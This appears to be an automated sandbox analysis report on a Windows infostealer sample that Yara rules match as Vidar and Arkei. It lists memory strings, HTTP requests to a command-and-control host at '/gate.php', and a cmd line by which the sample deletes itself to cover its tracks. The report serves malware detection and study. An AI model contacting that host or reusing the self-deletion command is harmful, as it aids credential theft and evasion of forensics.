Source: SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe, 00000000.00000002.1872701513.000000000F580000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe, 00000000.00000002.1872701513.000000000F531000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe, 00000000.00000002.1872701513.000000000F4BD000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe, 00000000.00000002.1855026120.00000000006BC000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, freebl3.dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
Source: SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe, 00000000.00000002.1872701513.000000000F580000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe, 00000000.00000002.1872701513.000000000F531000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe, 00000000.00000002.1872701513.000000000F4BD000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe, 00000000.00000002.1855026120.00000000006BC000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, freebl3.dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe, 00000000.00000002.1872701513.000000000F580000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe, 00000000.00000002.1872701513.000000000F531000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe, 00000000.00000002.1872701513.000000000F4BD000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe, 00000000.00000002.1855026120.00000000006BC000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, freebl3.dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0N
Source: SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe, 00000000.00000002.1872701513.000000000F580000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe, 00000000.00000002.1872701513.000000000F531000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe, 00000000.00000002.1872701513.000000000F4BD000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe, 00000000.00000002.1855026120.00000000006BC000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, freebl3.dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.thawte.com0
Source: SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe	String found in binary or memory: http://s.symcb.com/universal-root.crl0
Source: SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe	String found in binary or memory: http://s.symcd.com06
Source: SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe	String found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
Source: SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe, 00000000.00000002.1872701513.000000000F580000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe, 00000000.00000002.1872701513.000000000F531000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe, 00000000.00000002.1872701513.000000000F4BD000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe, 00000000.00000002.1855026120.00000000006BC000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, freebl3.dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
Source: SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe	String found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
Source: SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe, 00000000.00000002.1872701513.000000000F580000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe, 00000000.00000002.1872701513.000000000F531000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe, 00000000.00000002.1872701513.000000000F4BD000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe, 00000000.00000002.1855026120.00000000006BC000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, freebl3.dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
Source: SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe, 00000000.00000002.1872701513.000000000F580000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe, 00000000.00000002.1872701513.000000000F531000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe, 00000000.00000002.1872701513.000000000F4BD000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe, 00000000.00000002.1855026120.00000000006BC000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, freebl3.dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ts-ocsp.ws.symantec.com07
Source: SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe	String found in binary or memory: http://ts-ocsp.ws.symantec.com0;
Source: mozglue.dll.0.dr	String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe, 00000000.00000002.1872701513.000000000F580000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe, 00000000.00000002.1872701513.000000000F531000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe, 00000000.00000002.1872701513.000000000F4BD000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe, 00000000.00000002.1855026120.00000000006BC000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, freebl3.dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://www.mozilla.com0
Source: US0HLXBA.0.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: US0HLXBA.0.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: US0HLXBA.0.dr	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: US0HLXBA.0.dr	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe	String found in binary or memory: https://d.symcb.com/cps0%
Source: SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe	String found in binary or memory: https://d.symcb.com/rpa0
Source: SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe	String found in binary or memory: https://d.symcb.com/rpa0.
Source: US0HLXBA.0.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: US0HLXBA.0.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: US0HLXBA.0.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe, 00000000.00000003.1837204620.000000000F22E000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe, 00000000.00000002.1873249236.00000000101B1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe, 00000000.00000002.1873249236.00000000101B1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefox
Source: SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe, 00000000.00000003.1837204620.000000000F22E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF
Source: SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe, 00000000.00000002.1872944797.000000000F603000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe, 00000000.00000003.1819324389.00000000006B4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe, 00000000.00000002.1872944797.000000000F603000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe, 00000000.00000003.1819324389.00000000006B4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe, 00000000.00000002.1872701513.000000000F580000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe, 00000000.00000002.1872701513.000000000F531000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe, 00000000.00000002.1872701513.000000000F4BD000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe, 00000000.00000002.1855026120.00000000006BC000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, freebl3.dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: https://www.digicert.com/CPS0
Source: US0HLXBA.0.dr	String found in binary or memory: https://www.ecosia.org/newtab/
Source: US0HLXBA.0.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe, 00000000.00000002.1873249236.00000000101B1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/
Source: SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe, 00000000.00000003.1837204620.000000000F22E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
Source: SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe, 00000000.00000002.1873249236.00000000101B1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/
Source: SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe, 00000000.00000003.1837204620.000000000F22E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
Source: SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe, 00000000.00000002.1855183948.0000000000835000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe, 00000000.00000003.1851222377.0000000000834000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe, 00000000.00000002.1873249236.00000000101B1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
Source: SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe, 00000000.00000003.1837270361.000000000F22E000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe, 00000000.00000003.1837204620.000000000F22E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe, 00000000.00000002.1855183948.0000000000835000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe, 00000000.00000003.1851222377.0000000000834000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/fox-desktop&utm_source=bookmarks-toolbar&utm_campaign=
Source: SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe, 00000000.00000003.1837204620.000000000F22E000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe, 00000000.00000002.1873249236.00000000101B1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe, 00000000.00000002.1873249236.00000000101B1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe, 00000000.00000003.1837270361.000000000F22E000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe, 00000000.00000003.1837204620.000000000F22E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.

Source: unknown

DNS traffic detected: queries for: alpha.twinsources.shop

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe

Code function: 0_2_00406040 GetProcessHeap,RtlAllocateHeap,InternetOpenA,InternetSetOptionA,InternetOpenUrlA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,

0_2_00406040

Source: global traffic	HTTP traffic detected: GET /gate.php HTTP/1.1Host: alpha.twinsources.shopConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /request HTTP/1.1Host: alpha.twinsources.shopCache-Control: no-cacheCookie: PHPSESSID=5cjm0m95uuldn06f5j8ngk6f45

System Summary

Malicious sample detected (through community Yara rule)

Source: SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe, type: SAMPLE	Matched rule: Detects malware from DrqgonFly APT report Author: Florian Roth
Source: 0.0.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects malware from DrqgonFly APT report Author: Florian Roth
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_ArkeiStealer_84c7086a Author: unknown
Source: 00000000.00000002.1854624029.0000000000401000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: Windows_Trojan_ArkeiStealer_84c7086a Author: unknown
Source: 00000000.00000002.1855026120.0000000000600000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Vidar_114258d5 Author: unknown
Source: Process Memory Space: SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe PID: 6720, type: MEMORYSTR	Matched rule: Windows_Trojan_Vidar_114258d5 Author: unknown
Source: decrypted.memstr, type: MEMORYSTR	Matched rule: Windows_Trojan_Vidar_114258d5 Author: unknown

Source: SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe, type: SAMPLE	Matched rule: Unspecified_Malware_Sep1_A1 date = 2017-09-12, hash1 = 28143c7638f22342bff8edcd0bedd708e265948a5fcca750c302e2dca95ed9f0, author = Florian Roth, description = Detects malware from DrqgonFly APT report, reference = https://www.symantec.com/connect/blogs/dragonfly-western-energy-sector-targeted-sophisticated-attack-group, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.0.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Unspecified_Malware_Sep1_A1 date = 2017-09-12, hash1 = 28143c7638f22342bff8edcd0bedd708e265948a5fcca750c302e2dca95ed9f0, author = Florian Roth, description = Detects malware from DrqgonFly APT report, reference = https://www.symantec.com/connect/blogs/dragonfly-western-energy-sector-targeted-sophisticated-attack-group, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_ArkeiStealer_84c7086a reference_sample = 708d9fb40f49192d4bf6eff62e0140c920a7eca01b9f78aeaf558bef0115dbe2, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.ArkeiStealer, fingerprint = f1d701463b0001de8996b30d2e36ddecb93fe4ca2a1a26fc4fcdaeb0aa3a3d6d, id = 84c7086a-abc3-4b97-b325-46a078b90a95, last_modified = 2022-04-12
Source: 00000000.00000002.1854624029.0000000000401000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: Windows_Trojan_ArkeiStealer_84c7086a reference_sample = 708d9fb40f49192d4bf6eff62e0140c920a7eca01b9f78aeaf558bef0115dbe2, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.ArkeiStealer, fingerprint = f1d701463b0001de8996b30d2e36ddecb93fe4ca2a1a26fc4fcdaeb0aa3a3d6d, id = 84c7086a-abc3-4b97-b325-46a078b90a95, last_modified = 2022-04-12
Source: 00000000.00000002.1855026120.0000000000600000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Vidar_114258d5 reference_sample = 34c0cb6eaf2171d3ab9934fe3f962e4e5f5e8528c325abfe464d3c02e5f939ec, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Vidar, fingerprint = 9b4f7619e15398fcafc622af821907e4cf52964c55f6a447327738af26769934, id = 114258d5-f05e-46ac-914b-1a7f338ccf58, last_modified = 2021-08-23
Source: Process Memory Space: SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe PID: 6720, type: MEMORYSTR	Matched rule: Windows_Trojan_Vidar_114258d5 reference_sample = 34c0cb6eaf2171d3ab9934fe3f962e4e5f5e8528c325abfe464d3c02e5f939ec, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Vidar, fingerprint = 9b4f7619e15398fcafc622af821907e4cf52964c55f6a447327738af26769934, id = 114258d5-f05e-46ac-914b-1a7f338ccf58, last_modified = 2021-08-23
Source: decrypted.memstr, type: MEMORYSTR	Matched rule: Windows_Trojan_Vidar_114258d5 reference_sample = 34c0cb6eaf2171d3ab9934fe3f962e4e5f5e8528c325abfe464d3c02e5f939ec, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Vidar, fingerprint = 9b4f7619e15398fcafc622af821907e4cf52964c55f6a447327738af26769934, id = 114258d5-f05e-46ac-914b-1a7f338ccf58, last_modified = 2021-08-23

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe	Code function: 0_2_0041B020	0_2_0041B020
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe	Code function: 0_2_00410F00	0_2_00410F00
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe	Code function: 0_2_0041A790	0_2_0041A790
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe	Code function: 0_2_0041A190	0_2_0041A190
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe	Code function: 0_2_0041A5A0	0_2_0041A5A0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe	Code function: 0_2_004107B0	0_2_004107B0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe	Code function: 0_2_6094DA3A	0_2_6094DA3A
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe	Code function: 0_2_609660FA	0_2_609660FA
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe	Code function: 0_2_6092114F	0_2_6092114F
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe	Code function: 0_2_6091F2C9	0_2_6091F2C9
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe	Code function: 0_2_6096923E	0_2_6096923E
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe	Code function: 0_2_6095C314	0_2_6095C314
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe	Code function: 0_2_60950312	0_2_60950312
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe	Code function: 0_2_6094D33B	0_2_6094D33B
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe	Code function: 0_2_6093B368	0_2_6093B368
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe	Code function: 0_2_6096748C	0_2_6096748C
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe	Code function: 0_2_6093F42E	0_2_6093F42E
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe	Code function: 0_2_60954470	0_2_60954470
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe	Code function: 0_2_609615FA	0_2_609615FA
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe	Code function: 0_2_6096A5EE	0_2_6096A5EE
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe	Code function: 0_2_6096D6A4	0_2_6096D6A4
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe	Code function: 0_2_609606A8	0_2_609606A8
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe	Code function: 0_2_60932654	0_2_60932654
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe	Code function: 0_2_60955665	0_2_60955665
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe	Code function: 0_2_6094B7DB	0_2_6094B7DB
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe	Code function: 0_2_6092F74D	0_2_6092F74D
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe	Code function: 0_2_60964807	0_2_60964807
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe	Code function: 0_2_6094E9BC	0_2_6094E9BC
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe	Code function: 0_2_60937929	0_2_60937929
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe	Code function: 0_2_6093FAD6	0_2_6093FAD6
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe	Code function: 0_2_6096DAE8	0_2_6096DAE8
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe	Code function: 0_2_60936B27	0_2_60936B27
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe	Code function: 0_2_60954CF6	0_2_60954CF6
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe	Code function: 0_2_60950C6B	0_2_60950C6B
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe	Code function: 0_2_60966DF1	0_2_60966DF1
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe	Code function: 0_2_60963D35	0_2_60963D35
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe	Code function: 0_2_60909E9C	0_2_60909E9C
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe	Code function: 0_2_60951E86	0_2_60951E86
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe	Code function: 0_2_60912E0B	0_2_60912E0B
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe	Code function: 0_2_60954FF8	0_2_60954FF8
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe	Code function: 0_2_0046D319	0_2_0046D319

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe

Code function: String function: 004054F0 appears 577 times

Source: SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe, 00000000.00000002.1872701513.000000000F5AB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamevcruntime140.dll^ vs SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe
Source: SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe, 00000000.00000002.1872701513.000000000F580000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamesoftokn3.dll8 vs SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe
Source: SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe, 00000000.00000002.1872701513.000000000F531000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamemsvcp140.dll^ vs SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe
Source: SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe, 00000000.00000002.1872701513.000000000F4BD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamemozglue.dll8 vs SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe
Source: SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe, 00000000.00000002.1855026120.00000000006BC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamefreebl3.dll8 vs SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe

Source: SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe

Static PE information: invalid certificate

Source: Joe Sandbox View

Dropped File: C:\ProgramData\freebl3.dll A770ECBA3B08BBABD0A567FC978E50615F8B346709F8EB3CFACF3FAAB24090BA

Source: SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe	ReversingLabs: Detection: 52%
Source: SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe	Virustotal: Detection: 68%

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe" & exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 5
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe" & exit	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 5	Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe

File created: C:\Users\user\Desktop\JE3OPZM7

Jump to behavior

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@6/13@1/1

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe, 00000000.00000002.1872701513.000000000F580000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.0.dr	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
